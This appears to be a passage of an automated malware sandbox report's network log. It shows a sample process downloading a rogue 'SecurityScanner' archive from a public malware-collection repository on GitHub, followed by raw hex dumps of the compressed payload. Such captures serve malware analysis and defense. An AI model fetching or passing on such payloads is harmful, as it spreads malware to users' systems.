                                                                                                                                                            2022-09-29 12:45:25 UTC34586INData Raw: 0f 77 73 3a e7 fa 54 f0 4d 81 fe 7d 8f c9 53 52 59 51 d6 61 9b e2 f8 aa 71 9b 37 44 e7 6d 3a 79 12 44 22 f9 f4 91 c7 9c 7f 05 dd 26 b6 c0 07 3a b2 fa fa 14 c6 e2 9d 59 bc 0b 6f 87 38 3a 77 fe 5e a6 53 3e 28 12 76 8a 67 42 18 17 6e 29 cb bb f2 1c 0c 09 72 0c 17 9f 17 99 01 73 93 98 68 e8 f6 ff 9b c3 ef d8 51 2c 1a fd 47 95 a7 cd d9 c4 cb 36 7d b3 f0 66 b5 d2 95 ed 59 9b 3f a1 9a f2 bd 59 31 02 bb 15 b4 81 1a 71 b4 1f dd 00 82 7a dc 39 43 b7 d0 72 10 c5 e6 f9 d6 10 73 61 23 fd a1 c2 9a 9b 78 25 88 8f 50 7b c7 65 80 11 c7 86 25 e1 3e 1f c5 51 3f b2 83 30 aa 8c 5c ca bf d7 83 da b8 6b 7e bd 87 88 63 16 a7 c3 6b 07 a5 db 2b 4b 90 9b 92 80 5a 47 52 46 12 b7 4b 6d 7b ee 80 43 4a 2e 12 8d 19 81 e0 f4 52 57 11 48 92 12 21 82 00 6c 1b 3d 9e d0 c5 39 54 c9 0d 55 e1
                                                                                                                                                            Data Ascii: ws:TM}SRYQaq7Dm:yD"&:Yo8:w^S>(vgBn)rshQ,G6}fY?Y1qz9Crsa#x%P{e%>Q?0\k~ck+KZGRFKm{CJ.RWH!l=9TU


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            126192.168.2.649771140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:25 UTC34594OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            127140.82.121.4443192.168.2.649771C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:26 UTC34594INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:26 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:26 UTC34595INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            128192.168.2.649772185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:26 UTC34596OUTGET /Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            129185.199.110.133443192.168.2.649772C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:27 UTC34596INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 2284722
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "8a7bbc160d440a17d6ac37c40c91f7c318eb644a20006201447ba221ef497c63"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 3592:AB9E:ECB2F5:FC3511:63359366
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:27 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6942-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455527.544661,VS0,VE551
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 5a4661d347d2a95748994e5303277cee662dd10d
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:27 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:27 UTC34597INData Raw: 50 4b 03 04 14 00 01 00 08 00 c9 8a 34 3e 77 97 5c 9c f0 db 22 00 00 8e 23 00 1e 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 65 63 75 72 69 74 79 53 63 61 6e 6e 65 72 2e 65 78 65 20 c7 72 e1 36 7f a9 32 1e aa 4e 82 70 0b 31 2e cf b3 50 6d 0d 20 9a b2 e8 00 31 77 b5 12 cd 92 fd 0a 1a 82 2a 11 9a 37 0d df bd 74 5d be 55 96 56 66 a5 9f 8a de 75 d2 1a 74 ea 76 98 8c bf 2a d2 8b 29 78 4f 1c 3b 0f 14 ad 60 ae fc 26 16 76 c7 9f 81 44 64 89 8b 06 0a cc e9 04 69 e3 a6 b7 84 c9 38 6e 09 76 f4 9b fe 5e 0f 1c 1d 47 ba 7f bf 9e b9 2f a9 65 19 0c 6a 56 27 35 3e e4 ba 4e dd a8 59 0d d0 1a ad a0 77 f5 33 8e 92 27 e1 e4 1f 7b d1 f6 f3 a8 6f 8b 2f 48 b9 e8 fe 5e af af 36 90 9f 27 43 a1 0b fa f4 8d 03 7a 80 ec 8b 67 c5 62 82 4b a0 be 4c a5 3f 34 e3 c4 65 9d 91 84 50 de 33
                                                                                                                                                            Data Ascii: PK4>w\"#Endermanch@SecurityScanner.exe r62Np1.Pm 1w*7t]UVfutv*)xO;`&vDdi8nv^G/ejV'5>NYw3'{o/H^6'CzgbKL?4eP3
                                                                                                                                                            2022-09-29 12:45:27 UTC34613INData Raw: d0 69 36 f4 99 b6 d2 6a d7 f6 c5 ef e0 93 6b 92 8b 4c 8f dd 4b 1a aa 52 42 10 79 4f c8 4a 6a a7 d0 6a b5 80 32 a5 47 9d 42 41 4b df 84 95 74 3d 10 55 c3 e9 7e 68 60 34 de 88 47 c6 0f 96 0a 34 85 4c c1 bf 1c 31 54 4e 93 cb 7c bd 3d d3 37 7f 4c 70 0e 9e c8 53 c0 1d f1 08 c4 78 14 a5 8d be 25 26 57 55 94 0a 0a 39 73 58 74 2f 42 16 49 e1 8b 1c 4a 5c 8f bd cd 28 a5 5b bd fe e3 3e b4 2e 05 b4 67 b5 a5 37 c6 ca a7 57 fa da 46 c3 a0 03 59 0d ba f5 1c 7f 34 43 4c b5 ed 40 f6 ad 71 1b fb 7b 8c d8 74 dc 29 a4 81 2a 00 b4 14 e1 26 2e de 7d 86 d5 e3 fc 61 44 5c 89 d8 4e 6d 83 39 75 b9 c3 81 4f 7d a1 c3 29 78 b0 ee 87 6d ba ed 0c 2e c2 da 56 ae bc 56 7f c1 16 57 6b ad d7 93 16 d3 4a e1 79 c6 fa 3f 9f ee b1 b6 a9 83 0b d3 74 07 d3 b2 19 5e 6a ef 3a 92 02 0d ba fc 1f ae
                                                                                                                                                            Data Ascii: i6jkLKRByOJjj2GBAKt=U~h`4G4L1TN|=7LpSx%&WU9sXt/BIJ\([>.g7WFY4CL@q{t)*&.}aD\Nm9uO})xm.VVWkJy?t^j:
                                                                                                                                                            2022-09-29 12:45:27 UTC34629INData Raw: be 5d c4 78 6a 20 c6 66 59 4d e4 33 e1 b1 38 70 e0 27 28 56 41 49 a0 96 bf f8 94 69 63 95 39 90 74 ed 04 c0 a9 5d 32 8e b1 c0 50 3f 68 d4 d4 4e 33 0a 1b 33 2c eb 9d 55 16 33 a1 6f ac e6 03 33 91 a9 c3 ae cb 3b 0a 30 03 11 31 74 65 f6 c3 13 81 91 36 02 f8 ea 3e 54 77 16 96 a9 17 0a 96 b2 c6 ca 86 da 37 37 fb 90 5d 4f cb 75 0f 2b f6 fe f2 3e 0c 30 14 35 12 42 31 a9 53 a4 2b f4 c6 06 38 dc 99 d1 dd d4 49 24 9d 3a e6 68 57 0c b1 1f 6b 00 bb 1f 79 70 7e 9e 74 1b 2b e1 02 38 f5 4d 2c 96 05 e7 1f b0 e6 45 56 9a 5d 6b b9 00 7e 80 f4 b0 2c 3c cb ae b0 03 6b db 73 91 d1 30 79 99 5d 06 b3 e9 57 3e 18 44 d2 1b 95 c6 93 ef 3c 9c 67 46 95 53 19 4d 36 aa 95 c8 cc 69 87 90 25 2c 7c ef 89 f9 03 f9 de 57 bf dc b8 0a da 2d 3c 6d 4d 75 45 ef 03 7f 17 5f 1b bf 8f b9 50 b6 23
                                                                                                                                                            Data Ascii: ]xj fYM38p'(VAIic9t]2P?hN33,U3o3;01te6>Tw77]Ou+>05B1S+8I$:hWkyp~t+8M,EV]k~,<ks0y]W>D<gFSM6i%,|W-<mMuE_P#
                                                                                                                                                            2022-09-29 12:45:27 UTC34645INData Raw: ec db a4 40 56 40 b0 40 41 f4 0e 65 a1 4a d7 5e 2c 84 09 6b b0 ca a4 7d ea e6 8e 56 41 d1 c8 5a bf e2 56 b7 f9 aa 83 76 66 f3 66 1e ee 27 c2 f4 c6 31 8d ad 7a 35 ef 41 6f de 80 2f 79 44 a5 3a fe c6 10 74 3d b0 09 7a cc e8 32 98 c3 9a 35 20 f3 ea 12 ca d7 61 5b f0 31 b6 70 f3 b1 24 8c fd c3 94 8f 48 0e cf 2b 6b c8 65 d9 37 19 4d 24 f4 b3 bc ff 86 77 83 98 c9 c4 cf 24 b6 ef d5 2b 25 d1 44 dc 84 1f 2e 27 50 42 91 16 67 5d c7 fc fe 76 ec e3 95 05 82 dc 9d 30 96 25 42 f0 33 3f cd 9b 96 fd 9e 5f 3e d5 a8 69 6d af c6 42 ff b0 77 08 11 d4 1a b8 1b e4 84 63 a6 85 4f fc 94 07 98 25 88 42 bc 09 00 54 8e d6 7c f3 ff 7f 09 f3 57 3c 51 46 12 d9 23 aa 82 7f f7 cc 57 38 92 4b 8f 12 57 ae 69 5c d9 28 32 c6 9d 62 1f 64 41 f0 94 fe c2 44 f4 6f a2 4f d0 ce 83 89 0b cb 02 78
                                                                                                                                                            Data Ascii: @V@@AeJ^,k}VAZVvff'1z5Ao/yD:t=z25 a[1p$H+ke7M$w$+%D.'PBg]v0%B3?_>imBwcO%BT|W<QF#W8KWi\(2bdADoOx
                                                                                                                                                            2022-09-29 12:45:27 UTC34661INData Raw: e7 b9 f9 c2 7b 15 c1 41 e4 66 0d 32 35 01 4d ef 8d 67 70 f4 e3 d9 4b d7 64 c8 d6 2e 43 92 c9 bd d5 59 c5 d7 8f 8a b8 53 ff 50 eb c0 4b 95 d3 de 41 c9 9e 7a f6 a3 9e bb 29 d2 74 8e 19 e2 45 5e e9 52 d1 5c 74 c0 43 d4 f9 a1 ec e3 2e 69 3d bc be d8 f4 d8 c6 3e 10 fd 01 e5 4b 6f c2 72 45 e4 b7 5f 0e da 74 50 71 74 12 fa 57 b1 73 1b 52 ef c0 7a 3f af ab 4f 36 33 fa 6e a5 7e de 0d af 62 d7 bb 5c 75 6a a1 26 21 c2 61 67 c7 5e 05 3b c3 ca d7 09 d3 2c f6 24 72 4d e8 a1 72 70 3c 15 1b 52 82 31 ec 36 e2 9f c6 40 de 53 62 f7 28 59 ce 80 81 35 71 b6 08 b3 17 6b 58 1b 6e e5 1f 62 9f f8 2a 69 ce e3 41 62 d3 82 9e 15 38 3b 6b 1d 0a 59 38 a8 59 14 f5 87 76 cd 51 65 30 42 96 75 d8 28 8d 65 47 c9 55 c0 04 5d ed 85 64 ca 59 27 94 b0 50 36 32 74 57 25 d5 a6 45 26 ee 7c a5 74
                                                                                                                                                            Data Ascii: {Af25MgpKd.CYSPKAz)tE^R\tC.i=>KorE_tPqtWsRz?O63n~b\uj&!ag^;,$rMrp<R16@Sb(Y5qkXnb*iAb8;kY8YvQe0Bu(eGU]dY'P62tW%E&|t
                                                                                                                                                            2022-09-29 12:45:27 UTC34677INData Raw: 12 8b b1 53 94 32 73 8c 5c 0d 5b 3c 87 1a be 51 67 45 01 ef 76 c3 69 80 be 2c 86 57 3c b2 8f d1 fa cc 55 d1 ca a5 06 f6 78 f2 e4 f3 48 67 5e 26 9d 1f 11 ea 72 c1 b5 76 84 72 1f 6c cd 1a c2 92 b3 49 08 21 f3 9a b2 44 0e 72 fd b3 5b b7 99 16 d9 f4 d4 b1 88 28 bd 12 cf 20 a8 52 46 c0 26 aa 6f fb 87 d8 2f 0a 70 d7 5f 33 a5 0e 89 36 6e d3 e6 bd c8 90 62 ad ea a6 d5 1d d0 e3 01 25 7e 79 18 7b e9 9b 60 ca b9 81 66 d0 53 89 0d 04 7b 0c 01 f1 a2 4c 5b 20 51 e3 bd 23 04 18 9a 7a 1f f4 df a3 1c d0 8c 2b bc 47 d7 81 9b ac 6e dc c7 00 9b 90 f6 39 b8 51 00 97 ca 49 0e b1 75 c2 c5 cd d5 c3 35 60 b8 3e f3 d1 ff f8 ed e8 3f 32 fd 5b db 5a eb ac a8 40 f3 1d 77 98 d5 12 4e bb de 00 98 72 a1 12 bb 83 f8 ac 8f 97 7f 3a 90 96 13 7c 06 d1 8f bf 38 16 80 94 f1 d1 57 d1 91 39 20
                                                                                                                                                            Data Ascii: S2s\[<QgEvi,W<UxHg^&rvrlI!Dr[( RF&o/p_36nb%~y{`fS{L[ Q#z+Gn9QIu5`>?2[Z@wNr:|8W9
                                                                                                                                                            2022-09-29 12:45:27 UTC34693INData Raw: d7 a2 d3 6b 86 31 35 49 49 4d c7 89 0e ee ab 0e 2e 39 52 a6 b4 6c 6d ae 99 6d 89 54 6c 34 e1 f8 b3 ec 41 d8 9d 2d 76 2e 7f 94 36 c6 d3 a9 44 81 2f 71 0a f1 67 56 ae dd c0 ed 0f a1 f0 da 27 d1 f1 21 6b 31 3f 71 e7 0b a1 9f ec b4 2d 34 90 e3 51 54 e5 03 4d 3f 85 0e ee dd d8 63 db b5 7d 32 55 31 ac 46 b0 03 af f3 2d cc c7 71 e9 73 29 24 7a 05 ec 70 9c 28 16 3e 74 4b 95 58 8f 0d b9 0a ca 04 9c f7 7c 19 89 73 3e dd c3 7c 40 b8 1f 8a 74 20 79 fc 35 72 f7 3d 0f ee 9c b9 ef 8b 1b 0f c9 98 d4 ca 68 e3 dd 3c a5 17 e2 8d e7 a5 10 0e 21 5a 77 0f ba ba 84 2a 72 33 8e e7 ed 69 cc 90 68 52 3d 42 2e 1b dc 79 e5 73 2c 27 d2 14 69 55 87 fb da cf b2 8e ee 70 3c d3 e7 5c d2 7d 23 e8 58 96 8f 49 2b 1f 1b 9c cc cc b2 29 56 1f 62 36 0d cb 4b f5 a5 31 26 13 19 2d a1 af f7 5b 1b
                                                                                                                                                            Data Ascii: k15IIM.9RlmmTl4A-v.6D/qgV'!k1?q-4QTM?c}2U1F-qs)$zp(>tKX|s>|@t y5r=h<!Zw*r3ihR=B.ys,'iUp<\}#XI+)Vb6K1&-[
                                                                                                                                                            2022-09-29 12:45:27 UTC34709INData Raw: 5b 58 7b 34 cc 41 0b 3e 5a 79 c3 65 43 fe d3 54 85 c4 c8 96 88 b4 ee e5 b8 c8 14 d0 f8 81 1a eb ba 56 d2 76 be 32 1c 58 60 54 91 ed ce cf 73 1e 38 4c ec d4 30 aa 11 b7 e2 f7 9c cb f6 36 b0 7d 9d 72 4e 73 51 f0 1d 30 2b 16 33 18 42 99 53 e3 aa 66 26 a9 b9 9a 1e 57 f3 09 c6 0e cf 32 15 5a 62 dd 46 c1 52 95 29 e4 79 1d 21 f5 1d 22 d8 e1 8d 1f a0 6f a3 14 66 e6 f1 dc ac 44 88 b8 5d 22 cb ab 98 1f bd e6 e3 18 8f c3 67 e2 43 f5 4a 6e d3 12 9c c7 10 c7 f1 9d 4a c5 b0 01 2a e3 c9 99 c1 0b e2 04 78 1a f6 3e a8 4b 72 0f d9 b1 1f 99 af bf 66 5b 24 e3 3a da d0 54 13 35 63 d6 97 e6 10 32 f6 57 4c 57 d8 91 1d 50 84 6d 63 23 34 57 e5 c6 59 3a 94 d7 7c d8 c8 78 bc 8e 64 d1 a2 ff 4a 09 8a 93 c4 ce db 23 1c 1c 5e 15 2f d9 81 8a 6c b1 72 72 53 32 5b 14 b3 80 8a da 3e 3c b3
                                                                                                                                                            Data Ascii: [X{4A>ZyeCTVv2X`Ts8L06}rNsQ0+3BSf&W2ZbFR)y!"ofD]"gCJnJ*x>Krf[$:T5c2WLWPmc#4WY:|xdJ#^/lrrS2[><
                                                                                                                                                            2022-09-29 12:45:27 UTC34725INData Raw: 92 42 d2 63 a8 c4 69 58 b2 f0 37 6e f9 54 01 c8 a0 d0 b7 5e 64 ed 7e 02 0f c4 8b 8d 9e 90 e0 0e df 68 b0 a8 53 74 92 61 40 49 68 02 66 94 78 a0 ee a1 96 a7 e9 6c ca 74 3a d1 62 4a 03 ec 10 8b f9 c5 25 a7 7b d5 dc fc 88 73 58 b8 99 55 cc 29 ae 00 bf 7d 94 9b ab 24 4a f1 d8 ff d9 e9 52 d9 d1 eb 4b 71 ac c1 79 88 d1 c8 52 01 d9 b4 c7 04 17 17 73 b1 c1 45 d8 60 ba 66 59 8c e4 bd 1d 71 09 43 dd 89 f2 46 08 c3 0a 43 24 85 d0 1c 0c 78 8a ca f8 38 46 fa 95 67 87 77 26 82 03 57 6f 72 04 1d 7c 17 3d ff 12 bd 94 2a 56 03 a8 d1 f5 bd 14 b1 cb c1 9f fd 88 cd 34 ac ee e2 fd cf 2c f8 47 04 e0 af 59 d9 9d 25 1d 6e 2c 9e d7 78 e4 61 d4 a5 6e a9 3f f0 23 1f df a6 0f 66 39 f9 a5 b9 7d 2c 9f 39 78 c7 11 f5 5e f5 bf de 7a 11 4a 3c d7 08 74 71 a7 3a 71 f1 16 2e 56 5d 81 44 ab
                                                                                                                                                            Data Ascii: BciX7nT^d~hSta@Ihfxlt:bJ%{sXU)}$JRKqyRsE`fYqCFC$x8Fgw&Wor|=*V4,GY%n,xan?#f9},9x^zJ<tq:q.V]D
                                                                                                                                                            2022-09-29 12:45:27 UTC34741INData Raw: 26 31 09 b6 6c ba 1b b9 07 ec d2 98 1c 90 d8 65 31 af be 88 f7 b3 7a 23 f3 a9 16 fe 58 ee c8 3a 75 06 09 e9 c5 b7 01 57 09 f9 64 3e fa 3f 2b 87 05 4b 3b d9 d2 57 29 50 36 bc 3a 68 66 b4 bd 2f ab d0 e2 d0 58 1c 36 49 f1 d3 06 10 b1 56 a4 fc 67 55 2e 8b 21 31 51 a8 90 7a c2 f5 08 b8 7c 61 d5 21 20 4d 6e d9 e3 eb 71 9a f6 01 ce 2b 0d e7 6c 3a f0 1a 91 4e cc 04 48 e2 1d a9 41 b4 aa 01 36 3f 9c 81 83 09 d6 68 be 6e ed c6 fc 1d 79 85 7e 48 65 86 5b 5c 46 88 fd b7 f2 30 ed 16 c3 96 15 2f 41 49 c1 e2 71 91 40 e1 b4 d6 3c b1 10 5d 9a d6 88 a0 1f d6 10 51 6c 3b f9 42 2f 7c 19 34 50 30 b0 74 13 c4 ee aa 00 c1 31 33 d3 2d ea 65 2c 79 49 3c 7e 4d ba 12 3f d7 0a 4b ed e7 be 37 4b 4f f2 5e a7 db b7 8a 84 6d f5 76 8a 6c 90 04 76 d3 9b a3 26 ec 42 d2 18 52 76 c5 b7 cc c7
                                                                                                                                                            Data Ascii: &1le1z#X:uWd>?+K;W)P6:hf/X6IVgU.!1Qz|a! Mnq+l:NHA6?hny~He[\F0/AIq@<]Ql;B/|4P0t13-e,yI<~M?K7KO^mvlv&BRv
                                                                                                                                                            2022-09-29 12:45:27 UTC34757INData Raw: 0f f6 55 99 86 6d 27 80 90 14 f2 47 b2 98 41 20 7a f2 fe 59 a0 33 90 da fa 34 82 94 f2 63 e0 22 35 5b 0b 46 8a 48 17 86 47 08 a0 40 34 05 9a b3 53 25 65 dc e4 be 63 96 d5 10 aa 48 29 0a 8b bc 36 31 f3 b2 b8 49 73 6e e7 5d 9b 9c 13 2d ed fb dc 2a 33 ae 35 6e a3 98 9f d3 fe 44 22 88 5b ce 67 f5 f1 3c eb 2b c2 04 10 a7 ee aa 62 43 68 67 47 9f 59 53 79 84 2e c5 49 ab 4a d8 49 40 15 6e 35 49 dd 4c 53 e4 d2 3f 09 e6 06 27 fb 4b e9 8c 0a f9 e6 d2 58 fe 52 31 87 ab a4 26 60 db 79 e3 9a 73 6f 1c 41 8c bb 7a 5d 89 ed ea e8 17 71 99 f3 66 da f5 83 a5 79 6f 5c ff e1 e2 d7 7f 75 af 46 82 56 0a ce f8 a8 a1 f4 a4 03 48 73 89 c8 be c8 03 c3 07 3e a6 38 2f 02 5e 7d fe e1 ec cc 4b 0f 8d 9b af 14 e1 e5 92 db a6 41 e8 50 8e a7 2f e4 67 f1 ea 20 22 5e 4b 8f c6 c5 c9 aa 74 50
                                                                                                                                                            Data Ascii: Um'GA zY34c"5[FHG@4S%ecH)61Isn]-*35nD"[g<+bChgGYSy.IJI@n5ILS?'KXR1&`ysoAz]qfyo\uFVHs>8/^}KAP/g "^KtP
                                                                                                                                                            2022-09-29 12:45:27 UTC34773INData Raw: 35 14 24 cc f8 66 a3 e8 00 a0 a4 c5 2d 15 b6 29 fe 51 f9 81 f4 94 37 9a 07 7d 46 d4 f5 81 06 dd aa 2b 9d 67 31 f7 6a f5 1a 3c b9 cb c5 fc c7 16 2f c3 a3 e6 e2 37 6c c7 7a 82 59 9a 56 c0 f1 bb 4c 3a 8d ca 8e 9c 58 d5 06 24 87 fb ab c7 19 51 b0 c8 c8 e7 5d f7 d6 e5 4a 20 29 40 bd 5a b3 b2 82 ce 01 5f 66 5a db de 73 9e 64 73 ec 6b 9c ec 1e c7 c6 97 6e 30 ee a7 f8 9b ea 93 3a 3c 84 5b 31 99 c8 04 2c f5 95 7c f1 ba c2 7b 8b 39 6c 3c 39 57 7a ce 79 c1 24 a0 85 3e 5b 37 40 e3 88 ec 1c 54 b6 76 15 bb d4 81 b2 ae 5f 9d a9 2d d1 c6 38 e9 42 ab 23 c5 bc ff 89 e9 52 8c ef 25 ef e2 7d b6 bf aa 68 01 be e1 39 6e bf 01 cb 5e 6c 9c 5a a9 c3 6b cc f1 85 02 75 a8 ae d0 e2 d5 6f f2 b9 99 92 3b 3e 56 f4 a5 9c 86 62 1b 72 11 c1 db d6 19 95 c0 51 d0 ff b3 74 e0 97 59 e3 07 af
                                                                                                                                                            Data Ascii: 5$f-)Q7}F+g1j</7lzYVL:X$Q]J )@Z_fZsdskn0:<[1,|{9l<9Wzy$>[7@Tv_-8B#R%}h9n^lZkuo;>VbrQtY
                                                                                                                                                            2022-09-29 12:45:27 UTC34789INData Raw: cb c7 4f d8 fd 0f ff 01 29 06 99 0e 35 20 aa 27 2a e5 80 45 48 5a 5c 5c 1f 14 b8 17 ac 0f 8e 0a b3 24 65 80 8d 81 96 43 c1 37 80 5b 59 f9 d7 53 af c2 7f 48 2b 52 d2 f4 25 85 15 d9 99 1d 3d 46 25 99 a2 5e d0 cc da f2 d9 77 77 10 0d dc 1e e4 33 eb 34 4a 23 70 0c d2 db 88 76 15 8b 76 fa aa 0c 02 00 0c 1e 81 59 1f 1d 67 af 6c 45 66 8f d8 6b 75 80 66 1b c6 51 9a 68 22 15 60 11 6d 63 fc 35 b1 45 e9 88 75 f5 4c 4a 7b 72 bb 9b f4 57 4f 52 b8 b6 f8 e3 e8 19 0c 10 d9 07 4d e7 e8 f6 11 bf f2 0f ca 01 f2 eb 54 f2 df 36 d9 22 c0 bb b6 d2 fd 49 4b 90 91 4b 3c ee f4 26 f3 62 95 c7 e6 15 e7 6c 90 dd 17 a7 d1 d1 0a 2f c8 65 20 c5 c6 62 52 8a 23 2f 5b 3b 4f e8 dd 22 54 6d bc 3e 1b ec ec 28 80 03 27 bd de f0 00 22 7f e0 af 91 ba ef b8 14 6d 72 d9 24 d6 e4 65 28 a4 ef 4c 7f
                                                                                                                                                            Data Ascii: O)5 '*EHZ\\$eC7[YSH+R%=F%^ww34J#pvvYglEfkufQh"`mc5EuLJ{rWORMT6"IKK<&bl/e bR#/[;O"Tm>('"mr$e(L
                                                                                                                                                            2022-09-29 12:45:27 UTC34805INData Raw: 1c 3b 7b fa fa a7 7a 3f 35 00 96 9d c9 46 0d 14 58 10 8a 57 bd 55 7b b3 ea 2d a6 46 ee b5 b0 4f c2 5d 28 31 31 c2 b4 55 5a 2e c7 6d 01 84 67 19 87 29 63 15 76 b9 3c de 4f 80 d7 8d ad c8 9c c0 1b a3 2b 69 76 be 17 f2 af c9 f5 0b 41 15 93 4b 24 d4 94 80 77 e5 e8 f7 55 38 84 ce 5c 7a f9 b4 cf 6f 52 f0 56 a8 10 ac b5 a5 ea 68 ff dd c7 0c 12 9a 0f 2f 36 86 73 fe a0 44 df 22 25 5d d4 7b a3 a6 65 66 ee 8a 2c 89 9d db 87 98 d5 7a 06 b0 92 81 87 80 a7 54 06 b5 c8 27 6f d3 00 36 23 69 c2 8d 9b 01 6d 55 6f ad 4e eb 06 70 eb 7f 26 f2 57 bb b1 f3 e5 6b 78 19 e3 27 a3 4a 8c 01 a6 98 ce d6 3b f0 a3 e2 20 b1 a1 9d 2b c7 57 ce 54 45 00 15 de d9 5e a1 e5 88 e7 f3 b3 07 fb 67 f9 a2 7a 0c 97 3d dc 14 d0 db 67 8a ca ea 70 ee ec 6b 29 6a 04 c2 e5 56 4a a7 c7 a3 91 62 84 7e 4d
                                                                                                                                                            Data Ascii: ;{z?5FXWU{-FO](11UZ.mg)cv<O+ivAK$wU8\zoRVh/6sD"%]{ef,zT'o6#imUoNp&Wkx'J; +WTE^gz=gpk)jVJb~M
                                                                                                                                                            2022-09-29 12:45:27 UTC34821INData Raw: 3b ec 70 05 50 8a ae 74 59 02 67 4d 81 bf a8 9e fe 57 21 93 47 c5 89 8e 4a 56 74 c0 98 f5 5b c4 48 9b 78 b7 85 37 7a 54 2b e6 e4 ee 53 0e 11 60 46 f4 fb 96 cf 32 50 21 91 d9 74 e7 b2 5b 9b fa 87 6b 3a 88 6b b9 54 49 3c 96 22 ee 50 fb e9 ba fc 3f f4 41 a6 8d 4b 9f 56 b5 a0 2f 80 b2 87 fe ac 97 31 13 8e 25 40 43 c6 93 3c 58 08 13 22 3a b2 25 d8 ad b9 02 9f a3 71 7f e4 5b a1 a4 da e7 7c 49 a6 13 e9 54 65 5c 37 d8 6b 4c 0b 75 87 2e 21 77 44 57 97 65 58 de 3c d4 b0 5e 29 f5 df 9d c6 64 1b 7e 0d a4 70 26 8a 08 8e 7a 30 d7 ff ca 83 87 6b d2 e7 78 80 29 8d 85 8b 5e 30 2a db 6d 4b 44 d3 1b a4 32 bd e3 44 32 5e 0b 92 e8 3a 02 66 34 58 04 62 09 be 03 bf e3 f8 ef 89 dd 75 e6 79 7e b1 c8 6f 9d 0f 63 2d f3 40 40 dd 9f 79 7d 12 6c 0f fe 4c ca aa b6 ff d8 63 e4 1d 62 63
                                                                                                                                                            Data Ascii: ;pPtYgMW!GJVt[Hx7zT+S`F2P!t[k:kTI<"P?AKV/1%@C<X":%q[|ITe\7kLu.!wDWeX<^)d~p&z0kx)^0*mKD2D2^:f4Xbuy~oc-@@y}lLcbc
